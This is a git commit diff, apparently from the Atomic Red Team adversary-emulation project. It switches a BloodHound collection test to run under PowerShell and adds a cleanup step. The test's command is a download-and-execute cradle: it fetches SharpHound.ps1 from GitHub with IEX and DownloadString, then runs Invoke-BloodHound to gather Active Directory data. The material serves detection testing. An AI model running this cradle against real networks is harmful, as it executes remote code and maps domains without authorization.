Generate docs from job=validate_atomics_generate_docs branch=master

This commit is contained in:
CircleCI Atomic Red Team doc generator
2020-03-27 20:02:20 +00:00
parent 647222638f
commit 2ad2ad0ffd
2 changed files with 13 additions and 6 deletions
+7 -3
View File
@@ -88,13 +88,17 @@ and then compress and store the data to the temp directory on the machine
| bloodurl | BloodHound URL | url | https://raw.githubusercontent.com/BloodHoundAD/BloodHound/a7ea5363870d925bc31d3a441a361f38b0aadd0b/Ingestors/SharpHound.ps1|
#### Attack Commands: Run with `command_prompt`!
#### Attack Commands: Run with `powershell`!
```cmd
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{bloodurl}'); Invoke-BloodHound"
```powershell
IEX (New-Object Net.WebClient).DownloadString('#{bloodurl}'); Invoke-BloodHound
```
#### Cleanup Commands:
```powershell
Remove-Item $env:temp\*BloodHound.zip -Force
```
+6 -3
View File
@@ -23068,10 +23068,13 @@ execution:
type: url
default: https://raw.githubusercontent.com/BloodHoundAD/BloodHound/a7ea5363870d925bc31d3a441a361f38b0aadd0b/Ingestors/SharpHound.ps1
executor:
name: command_prompt
name: powershell
elevation_required: false
command: 'powershell.exe "IEX (New-Object Net.WebClient).DownloadString(''#{bloodurl}'');
Invoke-BloodHound"
command: 'IEX (New-Object Net.WebClient).DownloadString(''#{bloodurl}'');
Invoke-BloodHound
'
cleanup_command: 'Remove-Item $env:temp\*BloodHound.zip -Force
'
- name: Obfuscation Tests